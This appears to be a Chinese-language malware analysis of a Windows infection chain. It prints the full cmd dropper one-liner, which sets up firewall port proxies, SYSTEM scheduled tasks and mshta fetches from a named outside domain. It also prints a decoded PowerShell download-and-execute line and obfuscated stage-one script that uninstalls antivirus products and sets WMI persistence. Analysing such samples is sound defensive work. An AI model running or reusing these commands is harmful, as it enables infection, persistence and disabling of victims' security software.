起因
分析
1.txt
文本内容如下
cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65529 DNSS3 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn BIzdRfgY /tr "c:\windows\kNnk.exe" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pBS_S-AUDIT"^&schtasks /run /TN Autocheck^&schtasks /delete /TN BIzdRfgY /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN BIzdRfgY /tr "c:\windows\kNnk.exe"^&schtasks /run /TN BIzdRfgY^&schtasks /delete /TN Autoload /f^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat&cmd /c c:\windows\temp\installed.exe
简单格式化下
cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&
echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&
echo "*" >c:\windows\temp\eb.txt&
//配置网卡、防火墙
echo netsh interface ipv6 install >>c:/windows/temp/p.bat &
echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&
echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&
echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat&
echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&
echo netsh firewall add portopening tcp 65529 DNSS3 >>c:/windows/temp/p.bat&
echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&
//powershell命令
echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&
//计划任务配置
schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn BIzdRfgY /tr "c:\windows\kNnk.exe" /F) else start /b sc start Schedule^&
ping localhost^&
//检查定时任务是否已启动
sc query Schedule^|findstr RUNNING^&
^&
^(schtasks /delete /TN Autocheck /f^&
//mshta下载马,截至分析时已无法访问
schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pBS_S-AUDIT"^&
//计划任务操作项
schtasks /run /TN Autocheck^&
schtasks /delete /TN BIzdRfgY /f^&
schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN BIzdRfgY /tr "c:\windows\kNnk.exe"^&
schtasks /run /TN BIzdRfgY^&
schtasks /delete /TN Autoload /f^&
schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&
schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&
//创建批处理,内容为启动服务
echo net start Ddriver >>c:/windows/temp/p.bat&
echo for /f %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&
echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&
echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&
echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&
cmd.exe /c c:/windows/temp/p.bat&
cmd /c c:\windows\temp\installed.exe
批处理功能
- 设置防火墙规则,转发65532、65531、65529的请求到1.1.1.1
- 创建计划任务定时启动
- 写入批处理检测
cmd.exe
进程
- 如果
cmd.exe
进程数量大于10则重启机器
powershell命令 下载执行PS脚本
powershell解码后如下
IEX(New-ObjectNet.WebClient).DownloadString('http://t.amynx.com/gim.jsp')
gim.jsp
下载下来是一个Poweshell
文件
gim.jsp 第一阶段攻击脚本
gim.jsp
I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb7bd7999a69fa51fddf9f8ddc79f7c7fffdef7f2c597df7efdf277fbe4fbbb7bdfcbbff872fe7af5bba55bbf30fd993b9fdefbfeabecdb27df1b7dfce264fe719a9e9e64e52a7fb59da60fed375f9db7fe37773efe8d93df38f9f8938fefa477f64da33b0f7777e5d74f761ee017fa9e7e7ff8f0fbafe8377cbe45009eaf72faebd53660ebc7a33bf7ed9b0fe9b307fafb03f3e9564a9fe6e8fcf4d5743bdddfdb75ef12663ff1d36fe85f81fd6adb0e873efbceec84feb56fd23be91ea193d12fdae2cdab87f46f6a5e4ed34f1feaeb77f6a895c5ebc0feb6b783cf0d62a9057e87e03cbb9b664dfb2a5db677d3bccdcb7c76376dde36593b9f36a0187dbfeb35a0373e017e9d76049f9bee69536d160789ff7e09fec9a775f5ecf7f83d7e8f74370585d765f693dbe9d3575f7ef72926ef938f0122cd57d76fb6d36555344d5eaf16d5495e4eb2a6789a5e3d9b36d4a8ced1345f6475f6924853e79775fe7a992d96d973fab3c9a7053ea05fdbfc7559d5edb23a6997795daf4fe8b32f4edfbcfe7df0e5a32f9eff5edf2688e9bccd5e6ea7d76d9dafaafae5226fcfb6e9c5941e60fc765a9593cf0819f439cdd2fbf7763f6beb6a556653faa02ad3157ee2cbcfca6a5ab555bd4a97c56775314bafe8c3674a17bc4caf5e2ff319f5f91921bffc8a3e932fd3bc5cd7e96c96a565995de575716e7fb9a40fe74d9b2ffbf80099fd7d834c556a4f84501c9b67d3fbfbf4c5fef512d42334f405c14671a0af3a6868ab3836f7ee73ffed345f2eab69ba3be6ff3ec3c4d170e463d34dfa70effefd4fb9fd326f9ba24cf72fab76ff92077efd8e50a5afb4f1ca0c269f66e7fa3b4dfbb248f377f9384061f6fac5d3d7021b1248a34f2f96c59226133d8554752f4feff21f18ee622aa0b41be25488606afe411ff7d3559e970d64b3adb3b649f561bebef34b30d18e7f9f4d0964b1a0bfae48b40186d401cdfbac98a757db844c3e172ebe22f4a677991d5a924fbc91bfc997c5f3193133b1fd217d0524091cf1ebde3d62cde6ba018b5f55b3657105269ee275703064a45d53fbd34348d602eae3453e8776f9e4ea19d86faa8cf7e217ff9e694302b1585fd4c7dbe00b70d3aaa8a7cd640df0ad9985aa867ce46602b35583d75943d52c81eb4664ebf2d4a22da4e0b74fd2a6c9ca936d9ac425116d79562cbe0bd1dafaacced18edf3ebc4313f53a054f82a7e55dd0f9b8aeeafa743bfd252043f3e59a47fffaf77ffda5e38797bfbffe9ab5d9d3196b85365b908639c7777bf796c577e9c5f4f8f519a1a04d8109b55b9eb5f9459d4127ebb4a5a7af4ebffddd7467e7d37be98bb36fbf39fb6eca235b0a3a3ca2c2a8b96c5a9c17b3ea0b33b2dffff74fbff8f2d5b3f45be99b93d3e7a7af85e29f5dd7f9fa2780fff39ff82e53ff225b5f909ab29fef5d2e0a9a5c854a9407c9f95562fcd56b909b9138c46f7636a7e7fe54023b3b9be03a9d50fad59f539d4c03763b25792a8b672d6b83cb531ac1f06ca161c8358a718f79ecf4032bf46a260b9da327cb45e9c5b2202e7e522b1b556fa49f414444e4582c217777686a57cd4f8fb38c7e19993fe8e716f5411e403dbe73e7fe16a982ba056af4de784de41b2942d470efab4eeb11aca6bc42bfe02d79859aed066d9bd50253f1190b3aa4dc28848f455f2c33108238ec33376f167941df687ffef18bef34e88854758a9f5bf36996d7956174f38a080aa4242a1bda9a4504fcaf42312c11425d91038ffb81642000d423f81dfcb489e5e9fb673196a7cf235c6f948ae3cd2ecbd347a4b8276f89e613fa9dc0f8da4bdfef2a31c36ec28ef48e016ffa8b49c026f637c4ffc57776dba29aa9466fabe5f6d679a10ee62ff9c5f32991883d1c99108b38fdeeec3ce30f41e08ecfb753fa76a9887555705563a22cb2da6a006732b43f3df9f2ec0b60fcf967065146fbba6e3dff0bc8fe985a34a3fa183d366f64dbc0b646427eecc7f41550172c4c889df32f1803bcc3e5ba768e9e34df1553c93018f2365b4cf9f297c80fede097fc987eaae4fb31f3f78fd18be68fb25c2fb7db7545fef31dfcfe1dbc2c5a860466b4938ef853fcaebf607e46fbe9e80ee49ffeb02ac00a7357f09dc62215e0544620fcf46d4ffe474487a75f9cfcfeaf5fd22ff6cb72f17b8f4112c6097367fedaa29f50724d7191bf1ad7f9acaccebf038febe4c7f8c1707fec17dfb9a350e90b010c5db42c32f263d176dce5feb13883e8e0bcb08030f1f6f7f44e633c58695e18b62bcef3a7165b523f0c4bbf6390a9ea2203ea0e0121755378efe0577d459497795fde6365ad1fed6e815bde1097daf19f7ce681d3d63071c468fa12331e08c1af3cc3cb9775d33678d74209b8cff0dcc750c7fc8f729e9db0884fc60e194b2771364536835cbff3695a2deea6a76fbe7a71f605b86ddadc5583081e82fb85b14f7dd1d079c89b324f7fd6706144c44b4c2199b943c3494d80d09d0c5464be51bb45e68022f2a59b8c5ff24be853f5810081851aa64d10f9c518d22fb9236f6e7d42d2621dd4efaafe3daf5e57b543605a7c41adf03a5eb718fce23b7be92fcaad6771ef772ff0397a53e47e89f4615fdce5e6d4ce91de1fcb2f69be5450105dee917ed17777ccbbfe1b7744dee95f7d91befaf25d3e5b9e3d7af4fdebacaeb3ef1169f08aa15ed46aab0ed3297626ec63d84733a1f663f00f4fe4de2ecda476ec4da8fdc49b4c4fdd5a96ea74476027e249f67ae4ee14acf4ba917f00e32e3c974ec78e75e44f353abe69f4ed22f40623e4318267debd4fb78c86801a08259f5af8c2df16f441cfd4ddd992b8f3441a52136ee0cc30d2109c221853cc3bcbe7d3d76a4029e632b674fb2a7f41936dbaf2a243f89d0b68e2e9f8ddf27a918de14a8ef8c3e9f882b2113f709fe84b95d188e39dfade0fe4fbaddff333e61ea6d39d3b9ffeeeac58496cb25730e25b9f7cba45eed71a18b94f7fe2a7a9d19b3b7b7bbbe3f183879fec3c1c8f15f2fd4f3f79707f3c3ed8dffafef7bf5767f3e9f7b69645f5d3a458ea759bd7bfd828e02d1571d2f31098e9727d6e346e5db51919be62592c60948e79c2a6e9f7f3b27a456ea202288bf513116f9e2e560bf4f1770d226526b13b53bb98922d7d39be6e8b7aaddfc38fcb5f7f6f0b509767cd1999df2dcdced00021686d417fcfce6c27df1d134c1fd294deffbefd4c758dd788deb936e86af3adcf3299c6df3821dadfc11cd2ffa8e1b7e437a6d59d3b4ce97a6bf4f4ecabafc677da295acc242944b12799ee35d25126ea64775af8a5a230601b0a7074fac5f18b57a7afbf7a74b9cca14ee4ef375f31b5f8b5975f7c79a2df6efd9eac31e97fbf07fdff136d7049dfe0630e68eecaf79f9435eb98ec50fe6617069fcb8f5df3a78290bfeede7db46adb39ffa15fac3f1340bfe497fc923b13fa69b805aa1134d87a97af2ecfcf7eb136271feacef7f5f7dd07c4753bdf9b7d0744b12f82cdb401bdcdbed3ebfd4ff3267bb2a8ea67349f14a75f526e083d98d8eb0e8973714974851cea67b5fecc5f57edeaba8617b77bfcedd7e3ebf92aab2fe4333bfd42746ac272ba35c248602a10f25c73a0429d8e0d4851538746045632802d32b2ad2411912882f49d8d6b6a7bc8d8696345b236681dbf7ed54789de7558314a9f31a0dd9d773b18f3c79261d8c19ff8ec336270ebf7afde9d8e57680da674d3f7d9ce6ef6edd9f32f7fd1f9aa7ef0ead3dfe72c3fdffde95d827439fd89af56cff7eefea09cfcf4eae4f9d39f9edc3ff862e7e4feef53ae7fd177df2e4fbeca5f3c9fef9fe7bfa8d87ff58377cb7bd3e3d73f7530bd7afb6aa7deb9470ee3f3c9faf9ea60f7e079317dfadd9d57bfcfdd370b2491eb7bbfd78345f9eddfe76c5ab43f78f30333febd172fee7d71f5f0ec634d650a1bbffce9fdb7f577cff1dea73fd97e7bb27eb15cbc7971efeee5c1e50574c762f57bd3bf4f763fbfa41fbff7fac16ef5ddc51eb3214865b984b9c412da328bf9847986b42429e9ea8bb18d57ce3dc7f0d04d22cd8c7ebc8967303bdaecc5674cf6ef4fe9dff1f8de83ddefc1927c3611f6f8c577e893b4bdd84ea7e2a38385a090a7636e36956687f42ffb0d5ba42b39e2ceaa7279553da53f49832cf3a224793a99e4df1db7645108077a813e0126f4db15fd4a0cfc1940fe628193890f4e8a195ca09106eb68fa7b36fbe28b6b7a7e7ffa3d95c89ed37164a99f8ad9a07ea13fe8c3df0331f5a5becc0e311b7343dd25b912f9bb6a72d12c38cfbe5a376ce609e7b2682856bf64b713d452b2532a726767874291257cbcbcceaecaec8b6dd2d6c79c766faf27fa19fdb9fb4b3103f54bce083d7cc4fe2ab91194300136f9252216247421ab40855c819621e3b72967fabf5cffee76ee9648e6bef8dd31eafc6d511af705896b40ceeb7c7e45c42546a1843772a6c8cba493bba9a46b633d53b7d4b9f64cbf312a9dfe9b755dfc2406e87aee74492fbd6faf66b0d21f662f36e4a11e3143efdfa3d20b6ea14768fd943bc740d0ffea32eb75edaf541012e05b436c05f13eb8b8a9f6c7dd3666a5c1438059fbc3e638d29f19eaef7efd5612f110c906a98fdfeb7747d7764c3d0ce8af9b90c00bd00c40e563449e061b16ad028e63809399199f1479733ac870a66b7d2f4a06ea6331a52fb7b6d2ad14668ffeb73cabbeb32d13f90eef7effde68f77b77b63e7f51bc2273f3667c3a7d91bf3a7d76fa6a9537d5a43efd495a674db7c61f6f6d7d941ea6bf702bfddd4e5ffce4a3932fbf685e9e4ebfb73fdabd3fdabbfffdedef5467cb8f698595ba4a3f3f7db3fd93d9abb3ec49799aee7d9b9676b72f8fcbaf4ebf5cdef9de36ad0d8db76f6a367e7efae2f337f3f44eca905f7cfc31fdfa1b27ff0f'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
解密后内容如下(参考链接:5分钟解码powershell payload)
$2hl = ")'x'+]43[emOHSP$+]12[eMOhSp$ (& |)63]RaHC[,'NCh' ECalpeR- 93]RaHC[,'Uft' ECalpeR- )'
'+') )43]RaHC[,)911]RaHC[+07]RaH'+'C[+99]R'+'aHC[(ECaLpe'+'R-93]R'+'aHC[,)511]RaHC[+9'+'7]RaHC[+711]RaHC[( '+'eCalpERc- 421]R'+'aHC[,UftQjTUftECaLpeR-63]RaHC[,UftJdCUfteCalpERc-'+' 29]Ra'+'HC[,UftTR9Uft ECaLpeR- 69]RaHC[,)2'+'11]RaHC[+811]RaHC[+20'+'1]RaHC[( eCalpERc-)UftF/ astR nt/ eteled/ sksathcs
F/ 1astR nt/ etUft+Ufteled/ sksathcs
'+'
F/ 2astR ntUft+Uft/ eteled/ sksathcs
}
ecroF??? 1 e'+'ulaV- DROWDUft'+'+Uft epyT- noisserpmoCelbasiD wFcs'+'ret'+'emaraPTR9revreSnamnaLTR9secivreSTR9teSlortnoCtnerruCTR9METSYSTR9:MLKHwFc htaP- ytreporPmetI-teS
kcolb=noit'+'ca 531=troplac'+'ol pc'+'t'+'=locotorp ni=rid w'+'FUft+Uft'+'c531ynedwFc=emanU'+'ft+Uft elur dda llawerif llawerifvda hsten
kcolb=noitca 544=troplacolUft+Uft pct'+'=locotorp ni=rid wFc54'+'4yn'+'edwFUft+Uftc=eman elur d'+'da llawerif llaUft+Uftwerifvda hsten
35=troptcennoc 1.1.1.1=sserddatcennoUft+Uftc 92556=tropnetsil 4vot4v dda yxorptroUft+UftpUft+Uft ecafUft+Uftretni exe.hsten
dSNDS 92556 '+'pct gninepotrop dda llawerif exe.hsten c/ exe.'+'dmc
Uft+Uft
}'+' '+' '+'
5 peels-'+'trats
})}w'+'Uft'+'+UftFcdmcim'+'wJdC'+' c- neddih w- llehs'+'rewop c/wFc=etalpm'+'eTeniLdnammoC;wFcexe.dmcTR923metsysTR9swodniwTR9:cwFc=htaPelbatucexE;e'+'ma'+'NehtJdC+wF'+'ccwFc=emaN{@ stnemugrA- wFcnoitpircsbusTR9toUft+UftorwFc eUft+UftcapsemaN-'+' r'+'emusnoCtnevEeniLdnamm'+'Uft+UftoC ssalC- ecnatsnIimW-teS(=rem'+'usnoC;)potS n'+'oitcUft+Uf'+'tArorrE- };wFcsOumetsyS_SOfUft+UftreP_Uft+UftataDdet'+'tamroFfreP_23niWsOu ASI ecUft+Uftnats'+'nItegraTUft'+'+Uft EREHW 0063 NIHTIW tnevEnUf'+'t+UftoitUft+UftacifidoMecnatsnI__ MORF * TCELESwF'+'c=yreuQ;wFcLQWwFc=egaugnaLyreuQ;wFc2vmicTRUft+Uft9toorwF'+'c=ecapSemaNtnevE;emaNehtJdC+wFcfwFc=emaN{@ s'+'tnemugrA- '+'wFcnoitp'+'ircsbusTR9toorwFc ecapSemaN- retliFtn'+'evE__ ssalC- ecnatsnIimW-teS(=retliF{@ stnemugrA- Uft+UftwFcnoitpircsbusTR'+'Uft+Uf'+'t9tooUft+UftrwFc '+'ecapsemaN- gnidniBremusnoCoTretliF__ ssalC- ecnatsnIimW-teS '+'
)sOupsj.aasOu,sOupsj.asOu(ecalper.))5(gnirtsbus'+'.uJdC,Uft+UftsOu2UsOu(ecalper.))5,0'+'(gnirt'+'sbus.uJdC,sOu1UsOu(ecalper.spmtJdC=dmcimwJdC '+'
naR'+'teg=emaNehtJdC '+'
U'+'ft+U'+'ft{)suJdC ni uJdC(hcaerofUft+Uft
potS noitcArorrE- };wFcsOumetsyUft+UftS_SOfreP_ataDdettamroFfreP_23niWsOu ASI ecnatsnItegraT EREHW 0063'+' NIHTIW tnevEnoitacif'+'idoMecnatsnI__ MORF * TCELESw'+'Fc=yreuQ;wFcLQWwFc=eg'+'augnaLyreuQ;wFc2vmiUft+UftcTR9toorwFc=ecapSemaNtnevE;wFcllabkcalbwFc'+'=emaN{@ stneUft+UftmugrA- wFcnoitpiUft+UftrcsbusT'+'R9toorwFUft+Uftc ecapSemaN- retliFtnevE__ ssalC- ecnatsnIimW-teS
{)1tiodJdC'+' ton-(fi
'+'}{hctac}
wFcsOullabkcalbsOuU'+'ft+Uft=emaNwFc retlif- sOunUft+UftoitpircsbusTR9toorsOu ecapSemaNUft+Uft- retliFtnevE__ ssalC- tcejbOIMW-teG=1tiodJdC
{yrt
}
'+'}
5 pUft'+'+U'+'fteels-tra'+'tUft+Ufts
'+'wFcntJdCTR9fntJdCwFc nt/ nur/ sksathcs
1 peelsUft+U'+'ft-trats
}
Uft+Uft}
}{hctac}
} '+'
llun-tuoQjT)llunJUft+'+'UftdC ,0 ,llunJdC ,llunJdC'+' ,4 ,)))5('+'gnirtsbus.uJdC,sOu2UsOu(ecalper.))Uft+Uf'+'t5,0(gnirtsbus.uJdC,sOu1UsO'+'u(ecalper.spmtJdC,wFcDMC_SPwFc(ecalper.lmX.ksatJdC ,emaN.ksatJdC(ksaTretsigeR.redlofJd'+'C
{))wFcDMC_'+'SPwFc('+'sniatno'+'C.stneUft+UftmugrA.noitcaJdC(fi
{yrt
{ )snoit'+'cA.noitinUft+UftifeD.ksatJdC ni noitcUft+UftaJdC( hcaerof
{)'+'metiksatJdC ni ksatUft+UftJdC(hcUft+Uftaerof
)Uft+Uft1(sksaTteG.redlofJdC=metiksatJdC
)wFcfntJUft+UftdCTR9wFc(redloFteG.vrstsJdC=redlofJdC
1 peels-trats '+'
'+'
}
wFcDMC_SP c- neddih w- llehsrewopwFc rt/ F/ wFcntJdCTR9fntJdCwFc nt/ 06 om/ ETUNIM'+' cs/ Uft+Uf'+'te'+'taerc/ sksathcs
{ esle }
wFcDMC_SP c- neddih w- llehsrewopwFc rt/ F/ wFcntJdCTR9fntJdCwFc nt/ 06 om/ ETUNIM cs/ metsys ur/ etaerc/ sksUft+'+'Uftathcs
{)asJdC(fi
naRteg = ntJdC
}}naRUf'+'t+'+'U'+'ftteg=fntJdC{esle})naRteg(+sOuTR9swodniWT'+'R9tfoSorUft+'+'UftciMsOu=fntJdC{)asJdC(fi{)2 qe- Uft+Uft3%iJdC('+'fi
}naRteg=fntJdC{)1 qe- 3%iUft+Uf'+'tJdC(fi
}sOUft+Uft'+'usOu=f'+'ntJdC{)0 qe- 3%iJdC(fi
)uJdC,suJdUft+UftC(fOxednI::]yarra[ = iJdC
{)suJdC ni uJdC(hcaerof
}
wFcllabkcalbw'+'Fc rt/ F/ llabkcalb'+' nt/ 021 omUft+Uft/ ETUNIM csUft+Uft/ etaerc/ sksathcs
{ esle }
wFcllabkcal'+'bwF'+'c rt/ F/ llabkcalb nt/ Uft+Uft021 om/ ETUNIM cs/ metsys ur/ etaer'+'c/ '+'sksathcs
{)asJdC(fi
{)tiodJdC ton-(fi
}{hctac}
)'+'wF'+'Uft+'+'UftcllabkcalbwFUft+'+'Uftc(ksaTteG.)wFcTR9wFc(redloFt'+'eG.vrstsJdC=ti'+'odJdC
{yrt
)(tcennoC.vrsts'+'JdC
U'+'ft+Uft
ecivreS.eludehcS tcejbOmoC- tcejbO-weN = vrstsJdC
Uft+Uft
)sOumo'+'c.xnyma.tsOu,sOumoc.g9rez.tsOu,sOumUft+UftocUft+Uft.0r3zz.tsOu(@=suJdC
}))6%)'+'modnaR-teG(+6( tnuoC- modnaR-teGQj'+'T)221..79+09..Uft+Uft56+75..84(]][rahc[(nioj- nruter{)Uft+Uft(naRteg noi'+'tcnuf
)wFcrotartsinimd'+'A'+'wFc ]eloRnItUft+UftliuBswodni'+'Uf'+'t+UftW.Uft+UftlapUft+U'+'fticnirP.ytiruUft+Uftc'+'eS[(eloRnIsI.))(tnerruCteG::]ytitnedIswodni'+'W.lapicnirP.ytiruceS[]lapicnirPswodniW.lapicnirP.'+'ytUft+UftiruceS[(=asJdC
sOu))sOusOu'+'*sOusOunioj-))modnar(,DIUU.)tcu'+'dorPmetsySretupmoC_Uft+Uft23niW tcejboimw-teg(,EMANRESU:vneJdC,EMANRETU'+'Uft+UftPMOC:vneJdC(@(+sOusOu?sOu+Uft+UftvJdC+sOupsj.a/sOusOu+lruJdC(a;sOusOu2UsOusOu+sOusOu1UsOusOu+Uft+UftsOusOu//:ptthsOusOUft+Uftu=lruJdC}}})bJdC]][rahc['+'nioj-(xepvfI{Uft+Uft))))]Uft+Uft171..0[dJ'+'dC]][rahc[(nioUft+Uftj-(gnirtS46esaBmorF::]trevnoc['+',Uft+Uft)redivorPecivUft+UftrUft+UfteSotpyrC'+'1AHS.yhpargotpyrC.ytiruceS tcejb'+'O-weN(,bJdC('+'ataDyf'+'irev.rUft+UftJdC(fi;)Uft+UftpJ'+'dC(sretemaraPtrop'+'mI.rJdC;redivUft+UftorPecivreSotpyrCASR.yhpargotpyrC.ytir'+'uceS tcejbO-weN=rJdC;10x0,Uft'+'+Uft00x0,10x0=tnenUft+UftopxE.pJdC;)sOuUft+UftsOu=01aHdLOqfpr7R6YIef1j1'+'vcQUpL2/zlbjpCLDjb58M0C5YluqWknCUeNLh4feqi4Rzxn3cASZ8cwkR0r03mugLbuLp818LicDW0RY/Tm2'+'r3K7mlHYIcitzTzvUft+Uft2NN3Mw9I'+'FUft+'+'UftPj4krWf2'+'6VtHbuNnmTN3/v8vgd'+'mpX'+'B1Gv'+'Xu71oWm2sOusO'+'u(gnirtS46esaBmUft+UftorF::]trevnUft+Uftoc['+'=suludoM.pUft'+'+UftJUft+UftdC;sretemaraPASRUft+Uft.yhpargotpyrC.ytiruceS tcejbO-weUft+UftN=pJdC;]cJdC..371[dJdC=bJ'+'dC{)371 tg- cJd'+'C(fi;tnuoc.dJdC=cJ'+'dC;'+')uJdC(wFcataDdaolnwoDwFc.)tneilpvfCbeW.teN tce'+'pvfjbO-'+'wpvfeN(=dJdC{)uJdC(a noitcnufsOu=spmtJdC
)sOuddMMyyyy_sOu tamroF-'+' etaD-teG(+wFcvJdC'+'?wFc=vJdC
tratser'+'Uft+Ufton/ sexobgsmsserppus/ '+'tnelisyrev/ wFceUft'+'+Uftxe.000sninuTR9erawlaM-itnATR9setyberawlaMTR91~argorPTR'+'9:CwFc c/ dmc
evitcaretn'+'ion/ llatsninu llac wFcsOu%ytiruceS notroN%sOu ekil Uft+UftemanwFc erehw tcudorp exe.cimw b/ trats c/ dmc
evitcaretnion'+'/ llats'+'n'+'inu llac wFcsOu%suriVitnA%sOu ekil emanwFc erehw t'+'cudorp exe.cimw b/ trats c/ dmc
evitcaretnion/ llatsn'+'inu'+' llac wFcsOu%ytiruceS%sOu ekil emanwFc erehw '+'tcudorp exe.cimw b/ trats c/ dmc
evitcaretnion/ Uft+Uftl'+'latsninu llUft+Uftac wF'+'csOu%pva%sOu ekil emanwFcU'+'ft+Uft ereh'+'w tcudorpUft+Uft exe.cimw b/ trats c/ dmc
evitcaretnion/ llatsninu llac wFcsOu%tsaUft+Uftva%sOu ekil'+' emanwFc erehw tcudorp exe.cimw b/ trats c/ dmc
evitcaretnion/ llatsninu llac wF'+'csOu%%yks'+'re'+'psa'+'K%%sOuUft+Uft ekil'+' emanwFc er'+'ehw tcudorp exe.cimw b/ trats c/'+' '+'dmc
'+'
evitcare'+'tnio'+'n/ llatsninu Uft+Uftllac wFcsOu%tesE%sOu ekil emanwFc erehw tcudorp eUft+Uftxe.cimw b/ trats c/ d'+'mcUft(( ( )UftUftnIoJ-U'+'ftxUft+]3,1[)(GNiRtsOT.EcNeREFERpesobrEVNCh (.'((" ;
(( GET-VaRIaBlE 2Hl -vAlUEOn)[- 1..- (( GET-VaRIaBlE 2Hl -vAlUEOn).LENGTh ) ]-JoIN'' )
对字符串翻转、美化后
; "(('.( hCNVErbosepREFEReNcE.TOstRiNG()[1,3]+tfUxtf'+'U-JoIntfUtfU) ( ((tfUcm'+'d /c start /b wmic.extfU+tfUe product where cFwname like uOs%Eset%uOscFw calltfU+tfU uninstall /n'+'oint'+'eractive
'+'
cmd'+' '+'/c start /b wmic.exe product whe'+'re cFwname '+'like tfU+tfUuOs%%K'+'asp'+'er'+'sky%%uOsc'+'Fw call uninstall /nointeractive
cmd /c start /b wmic.exe product where cFwname '+'like uOs%avtfU+tfUast%uOscFw call uninstall /nointeractive
cmd /c start /b wmic.exe tfU+tfUproduct w'+'here tfU+tf'+'UcFwname like uOs%avp%uOsc'+'Fw catfU+tfUll uninstal'+'ltfU+tfU /nointeractive
cmd /c start /b wmic.exe product'+' where cFwname like uOs%Security%uOscFw call '+'uni'+'nstall /nointeractive
cmd /c start /b wmic.exe produc'+'t where cFwname like uOs%AntiVirus%uOscFw call uni'+'n'+'stall /'+'nointeractive
cmd /c start /b wmic.exe product where cFwnametfU+tfU like uOs%Norton Security%uOscFw call uninstall /noi'+'nteractive
cmd /c cFwC:9'+'RTProgra~19RTMalwarebytes9RTAnti-Malware9RTunins000.extfU+'+'tfUecFw /verysilent'+' /suppressmsgboxes /notfU+tfU'+'restart
CdJv=cFw?'+'CdJvcFw+(Get-Date '+'-Format uOs_yyyyMMdduOs)
